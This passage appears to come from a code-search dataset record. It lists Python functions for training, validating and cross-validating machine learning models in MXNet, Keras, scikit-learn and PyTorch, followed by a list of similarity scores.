update_on_kvstore=None)\r\n mbox_loss = SSDMultiBoxLoss()\r\n ce_metric = mx.metric.Loss('cross_entropy_loss')\r\n smoothl1_metric = mx.metric.Loss('smoothl1_loss')\r\n\r\n self._model.collect_params().reset_ctx(ctx)\r\n self._model.hybridize(static_alloc=True, static_shape=True)\r\n\r\n # start training\r\n training_dict = {\"cross_entropy_loss\": [], \"smoothl1_loss\": [], \"val_map\": []}\r\n n_iters = 0\r\n for epoch in range(start_epoch, self.epochs):\r\n autograd.set_training(True)\r\n cur_lr = self.__get_lr_at(epoch)\r\n trainer.set_learning_rate(cur_lr)\r\n\r\n 
self._model.hybridize(static_alloc=True, static_shape=True)\r\n\r\n tic = time.time()\r\n # TODO: epoch + 1\r\n print('[Epoch {}/{} lr={}]'.format(epoch, self.epochs, trainer.learning_rate))\r\n ce_metric.reset()\r\n smoothl1_metric.reset()\r\n\r\n for i, batch in enumerate(train_loader):\r\n n_iters += 1\r\n data = gluon.utils.split_and_load(batch[0], ctx_list=ctx, batch_axis=0)\r\n cls_targets = gluon.utils.split_and_load(batch[1], ctx_list=ctx, batch_axis=0)\r\n box_targets = gluon.utils.split_and_load(batch[2], ctx_list=ctx, batch_axis=0)\r\n\r\n with autograd.record():\r\n cls_preds = []\r\n box_preds = []\r\n for x in data:\r\n cls_pred, box_pred, _ = self._model(x)\r\n cls_preds.append(cls_pred)\r\n box_preds.append(box_pred)\r\n sum_loss, cls_loss, box_loss = mbox_loss(\r\n cls_preds, box_preds, cls_targets, box_targets)\r\n autograd.backward(sum_loss)\r\n\r\n trainer.step(1)\r\n\r\n ce_metric.update(0, [l * self.batch_size for l in cls_loss])\r\n smoothl1_metric.update(0, [l * self.batch_size for l in box_loss])\r\n if n_iters % self.log_after == self.log_after - 1:\r\n name1, loss1 = ce_metric.get()\r\n name2, loss2 = smoothl1_metric.get()\r\n # TODO: epoch + 1\r\n print('[Epoch {}][Batch {}] {}={:.3f}, {}={:.3f}'.format(\r\n epoch, i, name1, loss1, name2, loss2\r\n ))\r\n toc = time.time()\r\n\r\n # perform evaluation during training\r\n if epoch % self.val_after == self.val_after - 1 and val_dataset is not None:\r\n if verbose:\r\n print(\"Model evaluation at epoch {}\".format(epoch))\r\n eval_dict = self.eval(val_dataset)\r\n training_dict[\"val_map\"].append(eval_dict[\"map\"])\r\n\r\n # checkpoint saving\r\n if self.checkpoint_after_iter > 0 and epoch % self.checkpoint_after_iter == self.checkpoint_after_iter - 1:\r\n if verbose:\r\n print('Saving model at epoch {}'.format(epoch))\r\n checkpoint_name = self.checkpoint_str_format.format(epoch)\r\n checkpoint_filepath = os.path.join(checkpoints_folder, checkpoint_name)\r\n self._model.save_parameters(checkpoint_filepath)\r\n\r\n name1, loss1 = ce_metric.get()\r\n name2, loss2 = smoothl1_metric.get()\r\n training_dict[\"cross_entropy_loss\"].append(loss1)\r\n training_dict[\"smoothl1_loss\"].append(loss2)\r\n # TODO: epoch + 1\r\n print('[Epoch {}] Training cost: {:.3f}, {}={:.3f}, {}={:.3f}'.format(\r\n epoch, toc - tic, name1, loss1, name2, loss2\r\n ))\r\n\r\n return training_dict", "def train_model(model, train, validation):\n # Add your code here\n\n monitor = EarlyStopping(monitor='val_loss', min_delta=1e-3, patience=5, verbose=1, restore_best_weights=True)\n\n model.fit_generator(\n generator=train,\n validation_data=validation,\n epochs=1000,\n callbacks=monitor\n\n )\n # Preprocessing (Enrichment)\n # Preprocessing (Normalisation)\n\n return model", "def trainRegressionModel(X,y):\n # # instantiate a logistic regression model, and fit with X and y\n # model = LogisticRegression()\n # model = model.fit(X, y)\n # # check the accuracy on the training set\n # print(model.score(X, y))\n #X['intercept'] = 1.0\n #del X['isCapitalized']\n #del X['isNN']\n #del X['isNNP']\n #del X['isJJ']\n #del X['isUpper']\n #del X['isPrecedingIN']\n logit = sm.Logit(y, X)\n result = logit.fit()\n print(result.summary())\n print(result.conf_int())\n model = LogisticRegression()\n model = model.fit(X, y)\n print(model.score(X, y))\n print(y.mean())\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)\n model2 = LogisticRegression()\n model2.fit(X_train, y_train)\n # predict class labels for the test set\n 
predicted = model.predict(X_test)\n print(predicted)\n for i in predicted:\n if i==1:\n print(\"Test:\"+str(i))\n print(max(predicted))\n #generate class probabilities\n probs = model2.predict_proba(X_test)\n print(probs)\n # generate evaluation metrics\n print(\"Accuracy: \"+str(metrics.accuracy_score(y_test, predicted)))\n print(\"AUC: \"+str(metrics.roc_auc_score(y_test, probs[:, 1])))\n print(metrics.confusion_matrix(y_test, predicted))\n print(metrics.classification_report(y_test, predicted))\n\n from sklearn.cross_validation import cross_val_score\n # evaluate the model using 10-fold cross-validation\n scores = cross_val_score(LogisticRegression(), X, y, scoring='accuracy', cv=10)\n print(scores)\n print(scores.mean())", "def train_an_epoch(self, train_loader, epoch_id):\n assert hasattr(self, \"model\"), \"Please specify the exact model !\"\n self.model.train()\n total_loss = 0\n kl_loss = 0\n rec_loss = 0\n # with autograd.detect_anomaly():\n for batch_id, sample in enumerate(train_loader):\n assert isinstance(sample, torch.Tensor)\n pos_u = torch.tensor(\n [triple[0] for triple in sample],\n dtype=torch.int64,\n device=self.device,\n )\n pos_i_1 = torch.tensor(\n [triple[1] for triple in sample],\n dtype=torch.int64,\n device=self.device,\n )\n pos_i_2 = torch.tensor(\n [triple[2] for triple in sample],\n dtype=torch.int64,\n device=self.device,\n )\n neg_u = torch.tensor(\n self.data.user_sampler.sample(\n self.config[\"model\"][\"n_neg\"], len(sample)\n ),\n dtype=torch.int64,\n device=self.device,\n )\n neg_i_1 = torch.tensor(\n self.data.item_sampler.sample(\n self.config[\"model\"][\"n_neg\"], len(sample)\n ),\n dtype=torch.int64,\n device=self.device,\n )\n neg_i_2 = torch.tensor(\n self.data.item_sampler.sample(\n self.config[\"model\"][\"n_neg\"], len(sample)\n ),\n dtype=torch.int64,\n device=self.device,\n )\n batch_data = (pos_u, pos_i_1, pos_i_2, neg_u, neg_i_1, neg_i_2)\n loss = self.train_single_batch(batch_data)\n total_loss += loss\n kl_loss += self.model.kl_loss\n rec_loss += self.model.rec_loss\n total_loss = total_loss / self.config[\"model\"][\"batch_size\"]\n rec_loss = rec_loss / self.config[\"model\"][\"batch_size\"]\n kl_loss = kl_loss / self.config[\"model\"][\"batch_size\"]\n print(\n \"[Training Epoch {}], log_like_loss {} kl_loss: {} alpha: {} lr: {}\".format(\n epoch_id,\n rec_loss,\n kl_loss,\n self.model.alpha,\n self.config[\"model\"][\"lr\"],\n )\n )\n self.writer.add_scalars(\n \"model/loss\",\n {\n \"total_loss\": total_loss,\n \"rec_loss\": total_loss - kl_loss,\n \"kl_loss\": kl_loss,\n },\n epoch_id,\n )", "def train(x_train, y_train, labels_train, batch_size=32, epoch=200):\n skf = KFold(n_splits=5, random_state=17, shuffle=True)\n i = 0\n model_paths = []\n for train_index, test_index in skf.split(x_train):\n x_tr_fold = x_train[train_index]\n y_tr_fold = y_train[train_index]\n x_val_fold = x_train[test_index]\n y_val_fold = y_train[test_index]\n lab_val_fold = labels_train[test_index]\n\n model = VGG_Unet_model()\n optim = Adam()\n model_paths += [\"models/fold{}.h5\".format(i)]\n model.compile(optimizer=optim, loss=full_loss, metrics=[dice_coef])\n callbacks_list = [TestCallback((x_val_fold, lab_val_fold), model_paths[-1], once_in=25)]\n\n x_val, y_val = [], []\n for x_cur, y_cur in zip(x_val_fold, y_val_fold):\n x_val.extend(get_cropped_array(x_cur))\n y_val.extend(get_cropped_array(y_cur))\n x_val = [augment_test(x)[0] for x in x_val]\n x_val = np.array(x_val)\n y_val = np.array(y_val)\n subsample_ind = np.random.choice(len(x_val), 
size=200, replace=False)\n\n steps_per_epoch = x_tr_fold.shape[0] // batch_size\n\n model.fit_generator(batch_generator(x_tr_fold, y_tr_fold, batch_size, augment_train),\n steps_per_epoch=steps_per_epoch,\n epochs=epoch, verbose=1, callbacks=callbacks_list, workers=6,\n validation_data=(x_val[subsample_ind], y_val[subsample_ind]))\n i += 1\n return model_paths", "def train_model(model, train_input, train_target, validation_input, validation_target, nb_epochs, mini_batch_size, learning_rate, momentum = 0, sched_ = None, opt = 'SGD', loss = 'MSE'):\n if opt == 'SGD' :\n optimizer = SGD(model.param(), learning_rate, momentum)\n elif opt == 'Adadelta':\n optimizer = Adadelta(model.param(), learning_rate)\n sched = Scheduler(learning_rate)\n \n if loss == 'MSE' :\n criterion = MSELoss()\n elif loss == 'CrossEntropy' :\n criterion = CrossEntropy()\n \n losses = []\n train_errors = []\n validation_errors = []\n\n for epoch in range(nb_epochs):\n acc_loss = 0\n nb_train_errors = 0\n indices = torch.randperm(train_input.size(0))\n \n for b in range(0, train_input.size(0), mini_batch_size):\n # indices for batch\n indices_subset = indices[b:b+mini_batch_size]\n # subsets for batch\n train_input_subset = train_input.index_select(0, indices_subset)\n train_target_subset = train_target.index_select(0, indices_subset)\n \n optimizer.zero_grad() \n output = model.forward(train_input_subset)\n \n for k in range(mini_batch_size):\n if torch.max(train_target.data[indices[b+k]], 0)[1] != torch.max(output[k], 0)[1]:\n nb_train_errors += 1\n \n loss = criterion.forward(output, train_target_subset)\n acc_loss += loss\n \n output_grad = criterion.backward()\n model.backward(output_grad)\n optimizer.step()\n if sched_ == 'step_decay' :\n sched.step_decay(epoch, learning_rate, 0.5, nb_epochs/4)\n if sched_ == 'clr' :\n sched.cyclical_lr(nb_epochs, learning_rate/4, learning_rate, epoch)\n elif sched_ == None :\n pass\n \n losses.append(acc_loss)\n train_errors.append((100 * nb_train_errors) / train_input.size(0))\n \n nb_validation_errors, _ = compute_nb_errors(model, validation_input, validation_target, mini_batch_size)\n validation_errors.append((100 * nb_validation_errors) / validation_input.size(0))\n \n if epoch%10 == 0: print('Epoch {:d} Train loss {:.02f} Train error {:.02f}% Validation error {:.02f}%'.format(epoch, acc_loss, (100 * nb_train_errors) / train_input.size(0), (100 * nb_validation_errors) / validation_input.size(0)))\n \n return losses, train_errors, validation_errors", "def train_model(self,model):\r\n \r\n train_state = {'stop_early': False,\r\n 'early_stopping_step': 0,\r\n 'early_stopping_best_val': 1e8,\r\n 'learning_rate': self.lr,\r\n 'epoch_index': 0,\r\n 'train_loss': [],\r\n 'val_loss': [],\r\n 'best_model':model}\r\n \r\n dataset = self.dataset\r\n loss_fn = self.loss_fn\r\n \r\n dataset.set_split('train')\r\n print(\"Training module with \"+str(len(dataset))+\" examples\")\r\n \r\n data_loader = DataLoader(dataset,batch_size=self.batch_size,shuffle=True,\r\n drop_last=True)\r\n \r\n optimizer = optim.Adam(model.parameters(), lr=self.lr)\r\n \r\n for epoch in range(self.epochs):\r\n train_state['epoch_index'] = epoch\r\n #First step in each epoch is to train over all batches\r\n model.train()\r\n dataset.set_split('train')\r\n train_loss = 0\r\n for b_i,batch_data in enumerate(data_loader):\r\n #Step 1: zero gradients\r\n optimizer.zero_grad()\r\n #Step 2: run forward\r\n X = batch_data['x']\r\n output = model(X)\r\n #Step 3: compute loss\r\n target = batch_data['y']\r\n loss = 
loss_fn(output,target)\r\n #Step 4: run backward\r\n loss.backward()\r\n #Step 5: update\r\n optimizer.step()\r\n \r\n #Record accumulated loss\r\n new_loss = loss.item()\r\n train_loss += new_loss\r\n \r\n train_loss /= b_i\r\n train_state['train_loss'].append(train_loss)\r\n \r\n #After training, compute loss on validation set and check for early stop\r\n model.eval()\r\n dataset.set_split('val')\r\n val_loss = 0\r\n for b_i,batch_data in enumerate(data_loader):\r\n #Step 1: run forward\r\n X = batch_data['x']\r\n output = model(X)\r\n #Step 2: compute loss\r\n target = batch_data['y']\r\n loss = loss_fn(output,target)\r\n \r\n #Record accumulated loss\r\n new_loss = loss.item()\r\n val_loss += new_loss\r\n \r\n val_loss /= b_i\r\n train_state['val_loss'].append(val_loss)\r\n \r\n print(\"Finished epoch \"+str(epoch+1)+\". Train loss=\"+\\\r\n str(train_loss)+\", Val loss=\"+str(val_loss))\r\n \r\n if val_loss < train_state['early_stopping_best_val']:\r\n #new best model, reset stopping counter, store model\r\n train_state['early_stopping_step'] = 0\r\n train_state['early_stopping_best_val'] = val_loss\r\n best_model = copy.deepcopy(model)\r\n best_model.load_state_dict(model.state_dict())\r\n train_state['best_model'] = best_model\r\n else:\r\n #val loss not improved; increase early stopping counter\r\n train_state['early_stopping_step'] += 1\r\n if train_state['early_stopping_step'] >= self.early_stopping_criteria:\r\n train_state['stop_early'] = True\r\n print(\"Val loss failed to improve. Stopping early.\")\r\n break\r\n \r\n return train_state['best_model'],train_state", "def cross_validation(self, stock_data):\n\n self.X_train, self.X_test, self.y_train, self.y_test = cross_validation.train_test_split(stock_data['X'], stock_data['Y'], test_size=0.2, train_size=0.8, random_state=3)", "def valid_one_epoch(self):\n prog_bar = tqdm(enumerate(self.valid_data), total=len(self.valid_data))\n self.model.eval()\n all_targets = []\n all_predictions = []\n with torch.no_grad():\n for idx, inputs in prog_bar:\n ids = inputs['inputs'].to(self.device, dtype=torch.long)\n mask = inputs['attention_mask'].to(self.device, dtype=torch.long)\n targets = inputs['targets'].to(self.device, dtype=torch.float)\n\n outputs = self.model(input_ids=ids, attention_mask=mask)\n all_targets.extend(targets.cpu().detach().numpy().tolist())\n all_predictions.extend(outputs.cpu().detach().numpy().tolist())\n\n val_rmse_loss = np.sqrt(mean_squared_error(all_targets, all_predictions))\n print('Validation RMSE: {:.2f}'.format(val_rmse_loss))\n \n return val_rmse_loss", "def cross_validation(ww_data, rw_data, k):\n # shuffle the data\n np.random.shuffle(ww_data)\n np.random.shuffle(rw_data)\n\n # calculate cutoff for each partition\n cutoff = ww_data.shape[0]//k\n redArr = []\n whiteArr = []\n tmpStart = 0\n tmpEnd = cutoff\n \n # create a list of k partitions for red and white data\n for x in range(k):\n if x != k-1:\n redArr.append(rw_data[tmpStart:tmpEnd])\n whiteArr.append(ww_data[tmpStart:tmpEnd])\n else:\n redArr.append(rw_data[tmpStart:])\n whiteArr.append(ww_data[tmpStart:])\n tmpStart+=cutoff\n tmpEnd+=cutoff\n\n\n redTraining = np.array(())\n whiteTraining = np.array(())\n accuracy = 0\n count = 0\n \n for x in range(k):\n # creates Test data set\n tmpRedTest = redArr[x]\n tmpWhiteTest = whiteArr[x]\n \n # creates list of partitons for training data set\n if x!=k-1:\n redTrainingList = redArr[:x] + redArr[x+1:]\n whiteTrainingList = whiteArr[:x] + whiteArr[x+1:]\n else:\n redTrainingList = redArr[:x]\n 
whiteTrainingList = whiteArr[:x]\n\n # stacks each training list into one nparray\n redTraining = np.vstack(redTrainingList)\n whiteTraining = np.vstack(whiteTrainingList)\n\n accuracy += experiment(whiteTraining, redTraining, tmpWhiteTest, tmpRedTest)\n count += 1\n # calculates accuracy and returns it\n result = accuracy/count\n return result", "def train_model(model, data_train, y_train, data_test, y_test, ARGS):\n callback_list = create_callbacks(model, (data_test, y_test), ARGS)\n train_generator = SequenceBuilder(data_train, ARGS, target=y_train, target_out=True)\n test_generator = SequenceBuilder(data_test, ARGS, target=y_test, target_out=True)\n history = model.fit_generator(generator=train_generator,\n epochs=ARGS.epochs, verbose=2,\n validation_data=test_generator,\n # validation_freq=[1, 5, 10],\n callbacks=callback_list\n # ,max_queue_size=15, use_multiprocessing=False,\n # workers=3, initial_epoch=0\n )\n return history", "def validate(self):\n X_orig = make_X_from_features(self._conf)\n train_sz = len(load_array(self._conf, 'task.dataset.id_train'))\n X = X_orig[:train_sz, :]\n y = load_array(self._conf, 'task.dataset.y_train')\n y = y.reshape(y.size)\n\n cv_method_name = self._conf['task']['params']['validation']['class']\n cv_params_name = self._conf['task']['params']['validation'].get(\n 'params', {})\n cv_params_name = _to_str_value(cv_params_name)\n\n cv_method = dynamic_load(cv_method_name)\n mean_cv_score = cv_method(X, y, self, **cv_params_name)\n\n task_metrics = self._conf['task']['params']['metrics']\n task_method = task_metrics['method']\n\n ume.db.add_validation_score(\n os.path.basename(self._jn),\n ume.__version__,\n task_method,\n mean_cv_score)", "def train(self):\n df = self.df\n self.scaler = MinMaxScaler()\n self.scaler.fit(df)\n df[df.columns] = self.scaler.transform(df)\n\n\n X_train, y_train = get_X_y(df, self.n_days, self.length , self.style)\n X_train = np.array(X_train)\n X_train.shape = (X_train.shape[0], X_train.shape[2])\n\n self.clf = LogisticRegression().fit(X_train, y_train)\n\n #es = EarlyStopping(monitor = 'accuracy',mode = 'min' , verbose = 1, patience = 100, restore_best_weights = True)", "def _cross_validate(\n x: pd.DataFrame,\n y: pd.Series,\n model: Callable,\n scorer: Callable,\n cv: int = 5,\n time_series: bool = False,\n random_state: Optional[int] = None,\n n_jobs: int = 1,\n ) -> float:\n if time_series:\n k_fold = sklearn.model_selection.TimeSeriesSplit(n_splits=cv)\n else:\n k_fold = sklearn.model_selection.KFold(\n n_splits=cv, shuffle=False, random_state=random_state\n )\n\n return sklearn.model_selection.cross_val_score(\n model, x, y, scoring=scorer, cv=k_fold, n_jobs=n_jobs,\n ).mean()", "def run_lgr():\n num_folds = 5\n with pd.HDFStore('./OT_clr_train_LGG_grade.h5') as store:\n X = store['expression'].values\n Y = store['labels'].values\n\n # standardize expression\n mu = np.mean(X, axis=0)\n std = np.std(X, axis=0)\n X = (X-mu)/std\n\n # define CVmodel to manage hyperparameter selection\n cvmodel = CVmodel(LogisticRegressor_skl,\n [1e-6, 1e-5, 1e-4, 1e-3, 1e-2,1e-1,1,10,100,1000], 'C^-1',\n solver = 'lbfgs', max_iter=5000, multi_class='auto')\n\n # define Predictor object to manage nested CV\n lg_predictor = Predictor(cvmodel,scorers.accuracy_scorer)\n\n # cross validate\n lg_cross_validation_scores = \\\n lg_predictor.cross_validate(X, Y,\n outer_folds=num_folds, inner_folds=num_folds)\n logger.info('Logistic Regression cross-validation = {0:.3f}'.format(\n np.mean(lg_cross_validation_scores)))", "def 
validate(val_loader, model, criterion, epoch):\n batch_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n\n # switch to evaluate mode\n model.eval()\n\n end = time.time()\n for i, (input, target) in enumerate(val_loader):\n target = target.cuda(async=True)\n input = input.cuda()\n input_var = torch.autograd.Variable(input, volatile=True)\n target_var = torch.autograd.Variable(target, volatile=True)\n\n # compute output\n output = model(input_var)\n loss = criterion(output, target_var)\n\n # measure accuracy and record loss\n prec1 = accuracy(output.data, target, topk=(1,))[0]\n losses.update(loss.data[0], input.size(0))\n top1.update(prec1[0], input.size(0))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % args.print_freq == 0:\n print('Test: [{0}/{1}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f})'.format(\n i, len(val_loader), batch_time=batch_time, loss=losses,\n top1=top1))\n\n print(' * Prec@1 {top1.avg:.3f}'.format(top1=top1))\n # log to TensorBoard\n # if args.tensorboard:\n # log_value('val_loss', losses.avg, epoch)\n # log_value('val_acc', top1.avg, epoch)\n return top1.avg", "def validate_model_with_params(self, model_params: dict) -> None:\n\n # init model\n model = CrossAttentionTransformerEncoder(**model_params)\n\n # init random sequences that don't exceed max sequences length\n seq_a_len = random.randint(0, model_params[\"max_seq_len_a\"])\n seq_b_len = random.randint(0, model_params[\"max_seq_len_b\"])\n batch_size = random.randint(1, 10)\n s1 = torch.randint(0, model_params[\"num_tokens_a\"], (batch_size, seq_a_len))\n s2 = torch.randint(0, model_params[\"num_tokens_b\"], (batch_size, seq_b_len))\n\n # processing sample\n output = model(s1, s2)\n\n # validation\n assert output.shape[0] == batch_size\n if output[:, 0].shape[1] != model_params[\"output_dim\"]:\n raise Exception(\n f\"Expected output dimension to be {model_params['output_dim']}, but got: {output.shape[1]}. used model parameters: {model_params}.\"\n )" ]
[ "0.67092973", "0.6439459", "0.6373035", "0.63298774", "0.6288726", "0.61524415", "0.6071506", "0.6043888", "0.6030679", "0.60297436", "0.6009352", "0.5996283", "0.59651506", "0.5964834", "0.5883891", "0.5877334", "0.5846096", "0.57740736", "0.5755319", "0.5751334", "0.57471675", "0.5740231", "0.5739641", "0.57371575", "0.57015836", "0.56994325", "0.5666097", "0.56631505", "0.5662652", "0.56621575", "0.5631688", "0.56198454", "0.5601584", "0.5527176", "0.55119246", "0.5500913", "0.55004704", "0.5499119", "0.54799646", "0.5465875", "0.54511154", "0.5450076", "0.54457206", "0.54429615", "0.54421353", "0.54353434", "0.5420726", "0.54172146", "0.54081064", "0.54033536", "0.5398616", "0.53949827", "0.53896844", "0.53859335", "0.5385311", "0.5382542", "0.5374201", "0.5352137", "0.53483766", "0.5344138", "0.53284127", "0.53090835", "0.5305456", "0.53042984", "0.52902615", "0.52813697", "0.52791524", "0.52763003", "0.5273129", "0.52624255", "0.5257723", "0.5252061", "0.5249418", "0.5248159", "0.5241804", "0.5237876", "0.5231722", "0.5217445", "0.52168435", "0.5211341", "0.52015436", "0.51981354", "0.5194741", "0.5189682", "0.5186058", "0.5181972", "0.5179446", "0.51721406", "0.51701176", "0.5164236", "0.51622844", "0.51608753", "0.51596683", "0.51574033", "0.51500493", "0.51495904", "0.51490206", "0.5144162", "0.5140526", "0.51399213", "0.51340944" ]
0.0
-1
DO NOT CALL THIS FUNCTION UNLESS YOU HAVE DATA YOU WANT TO STORE IT DELETES THE CURRENT DATA.
def store_images(database): # image folder folder_path = os.getcwd() + '/Data/Test' img_width, img_height = 224, 224 images = [] label = [] for _, dirs, _ in os.walk(folder_path, topdown=True): for directory in dirs: sub_folder_path = os.path.join(folder_path, directory) for _, _, files in os.walk(sub_folder_path): for name in files: if name != '.DS_Store': img = os.path.join(sub_folder_path, name) img = image.load_img(img, target_size=(img_width, img_height)) img = image.img_to_array(img) img = np.expand_dims(img, axis=0) images.append(img) label.append(directory) images = np.vstack(images) model = Model() predictions = model.model.predict(images, batch_size=10) db_actions.reinitialize_table(database) for i in range(100): prediction = predictions[i, :] normalized_prediction = prediction / np.sum(prediction) db_actions.add_encoding(database, normalized_prediction, label[i]) print("Sum is: {}".format(np.sum(normalized_prediction)))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def clearData():\n Co8PersistentData.__dataDict.clear()", "def clear_data(self):\n if isinstance(self.data, DataManager):\n self.data._update_keys(clear=True)\n else:\n self.data = {}", "def clear_storage(self):\r\n raise NotImplementedError('override me')", "def reset_data(self):\n self.data = []", "def clean_data():\n redis_db.flushdb()", "def delete(self):\n self.data = None", "def clean_up_data(self):\n pass", "def clear_data():\n conn = get_connect()\n #conn.execute(\"DELETE from match\")\n #conn.execute(\"DELETE from account\")\n #conn.execute(\"DELETE from championMatchData\")\n conn.execute(\"DELETE from championData\")\n conn.commit()\n conn.close()\n print(\"all data in info.db has been cleared\")\n return", "def reset_data(self):\n self.data = None", "def remove_data(data=None): #clear\n data = get_data(data)\n shutil.rmtree(data)", "def delete_data(self,*args):\n if args:\n for param in args:\n del self.data[param]\n self.__init__(**self.data)\n else:\n self.__init__()\n print('Deleted data. See current data by using print(object_name) or using check_data method')", "def clearStore(self):\n os.remove(self.uid+\".pcl\")\n self.items = []", "def clearValue(self):\n self.data = []", "def clear(self):\n self._store = {}", "def delete_data(self, data_sig):\n data_i = sqlite3.connect('data::memory:', check_same_thread=False)\n data_cursor = data_i.cursor()\n data_cursor.execute('DELETE FROM localdata where data_sig==(:data_sig)', {\"data_sig\":data_sig})\n item = data_cursor.fetchall()\n data_i.commit()\n data_i.close()\n return item", "def releaseTraingingData(self):\n del(self.documents)\n #del(self.sumsOfVectors)\n self.documents = {}\n #self.sumsOfVectors = {}", "def clear(self):\n self._data = []", "def clear(self):\n self._data = []", "def remove_data():\n # Removing the existing data\n col_answer_given.remove()\n col_answer_not_given.remove()\n col_q_not_given.remove()\n col_to_summarize.remove()", "def remove_data(self):\n db.session.delete(self)\n db.session.commit( )", "def clear_data_from_table():\n global data_base, table\n sqlite3_simple_clear_table(data_base, table)\n output_on_display.delete(1.0, END)\n output_on_display.insert(END, '')\n return", "def clear_data(cls):\n cls.__data.clear()\n cls.__counters.clear()", "def clear(self) -> None:\n self.data = {} # defaultdict fails (T282865)\n self.size = 0", "def current_remove(self):\n storage.close()", "def datamunge(cls, data):\n pass", "def clear(self):\n for key in self.__data.keys():\n del self.__data[key]", "def save_end(self):\n data = self.savedata\n self.savedata = None\n return data", "def saveData(self):\n pass", "def discard_temp_data(self):\n self.data = None\n self.points = None", "def removeData(key):\n #only string keys are accepted\n if ( type(key) != str ): return None\n \n try:\n del Co8PersistentData.__dataDict[key]\n except KeyError:\n pass", "def clear(self):\n self._data = PositionalList()", "def _finalize_data(self, data):\n return data", "def removeData(self, data: ghidra.program.model.listing.Data) -> None:\n ...", "def delete_all(self):\n with self.__lock:\n self.__data = dict()\n self.flush()", "def clear_data(self):\n self.game_list.clear()\n self.game_scores.clear()", "def clear(self):\n self._data.clear()", "def _reset_stored(self):\n ## Main information\n self.idxs = None\n self.sp_relative_pos = None\n self._setted = False\n self.ks = None\n self.iss = [0]", "def tearDown(self):\n self.all_ob = storage.all()\n self.all_ob.clear()\n storage.save()", "def delete(self, data):\n 
self.data.remove(data)", "def clear_temporary_data(self):\n self.extract_list = []\n self.transform_result = {}", "def reset(self):\n self._data = []", "def clearData(self):\r\n self.title.setVal(\"\"),\r\n self.first.setVal(\"\"),\r\n self.middle.setVal(\"\"),\r\n self.last.setVal(\"\"),\r\n self.suffix.setVal(\"\"),\r\n self.phone.setVal(\"\"),\r\n self.ext.setVal(\"\"),\r\n self.email.setVal(\"\"),\r\n self.affiliation.setVal(\"\")\r\n self.fullName.setVal(\"\")", "def save_data(self):\n pass", "def clear():", "def delete(self):\n return self.get_data()", "def store_data(self, data):\n self.data.append(data)", "def cleanup(self, data):\n tmp = copy.copy(data)\n for field in ('log_entries', 'instances',\n 'picked_instances', 'saved_instances',\n 'terminated_instances', 'skipped_instances'):\n if field in tmp:\n del tmp[field]\n return tmp", "def clear_data(self):\n if DataLoader.data is None:\n return\n\n self.clear_tree()\n # Clears the Header\n self.treeview['columns'] = []\n for i in self.treeview['columns']:\n self.treeview.column(i, anchor=\"w\")\n self.treeview.heading(i, text=i, anchor='w')\n # Clears the Data\n\n DataLoader.data = None\n gc.collect()\n self.summary_label.destroy()\n\n # Replace with default values\n self.treeview['columns'] = list(DataLoader.default.columns)\n for i in self.treeview['columns']:\n self.treeview.column(i, anchor=\"w\")\n self.treeview.heading(i, text=i, anchor='w')\n for index, row in DataLoader.default.iterrows():\n self.treeview.insert(\"\", 0, text=self.default.shape[0] - 1 - index, values=list(row))\n self.treeview.column('#1', width=500)", "def the_ending(self):\n storage.close()", "def clear_data_cache():\n load_glove.cache_clear()", "def reset_storage(self):\n self.set_storage()", "def reset(self):\n self.temp_data.clear()", "def removeall(self):\n\n # If there used to be a key, there must exist an old value blob somewhere in the database. 
It should be deallocated after a successful commit to disk.\n for key in self.keys:\n if self.keys[key] is not None:\n punchat,punchlen = self.keys[key]\n self.awaitingpunch.append((punchat, punchlen))\n \n self.keys = {}\n self.buffered = {}\n self.cache = {}\n \n if self.autocommit:\n commit()", "def test_data_object_del(self):\n pass", "def clear(self):\n self._storage.clear()", "def store_data(self):\n return self._store_data", "def clearRecord(self): \n if self._isinstalled:\n for f in self._table:\n try:\n del self.__dict__[f.name]\n except KeyError:\n pass\n \n for f in self._extra_sql_columns:\n try:\n del self.__dict__[f]\n except KeyError:\n pass\n \n self._original_values.clear()\n self._modified_values.clear()\n self._mtm_referencelist.clear()\n self._child_referencelist.clear()\n self._hasdata = False\n self._ismodified = False\n self._hasdata = False\n self._isnew = False\n self._objectid = None\n self._isinstalled = False\n self._astxt = \"(null)\"", "def finalize(self):\n self.storage.finalize(basket=self)\n self.uncache()\n self._data = None\n self.dirty = False", "def clear_data():\n logger.info(\"Delete Structure instances\")\n Structure.objects.all().delete()\n logger.info(\"Delete StructureType instances\")\n StructureType.objects.all().delete()\n logger.info(\"Delete Industry instances\")\n Industry.objects.all().delete()\n logger.info(\"Delete Price instances\")\n PriceList.objects.all().delete()\n logger.info(\"Delete Stock instances\")\n Stock.objects.all().delete()\n logger.info(\"Delete News instances\")\n News.objects.all().delete()\n logger.info(\"Delete NewsImages instances\")\n NewsImage.objects.all().delete()\n logger.info(\"Delete News Sections instances\")\n NewsCategorySection.objects.all().delete()\n logger.info(\"Delete Analysis instances\")\n AnalysisOpinion.objects.all().delete()\n logger.info(\"Delete Analysis Images instances\")\n AnalysisImage.objects.all().delete()\n logger.info(\"Delete Analysis Sections instances\")\n AnalysisCategorySection.objects.all().delete()", "def reset_the_db(_step):\r\n reset_data(None)", "def delLocalData(self):\n try:\n if len(self.localFilename): os.remove(self.localFilename)\n except Exception as e:\n pass", "def store(self):\n\n pass", "def delete_data(self, name):\n assert name, \"Must input a valid dataset name.\"\n try:\n self.data[\"dataset\"].pop(name)\n self.update_categories()\n self.write_data_cache(self.data)\n except KeyError:\n raise KeyError(\"The dataset \\'{}\\' does not exist in the cache.\".format(name))", "def delete_data(self):\n conn = self._connect_DB()\n cur = conn.cursor()\n cur.execute(\"DELETE FROM movie_table;\")\n self._close_connection(conn)", "def clear(self):\r\n self._state[\"data\"].clear()\r\n self._state[\"session\"].request_rerun()", "def clear(self):\r\n self._state[\"data\"].clear()\r\n self._state[\"session\"].request_rerun()", "def test_data_object_untrash(self):\n pass", "def delete_plugin_data(self):", "def storage_logic(self):\n if len(self.difference) > 0:\n # Assumes we have comics in the datastore and just want to add more.\n self.store_comics(self.difference)\n elif len(self.urls_from_datastore) == 0:\n # Assumes the datastore is empty.\n self.store_comics(self.urls_from_json)", "def delete(self, data):\r\n pass", "def 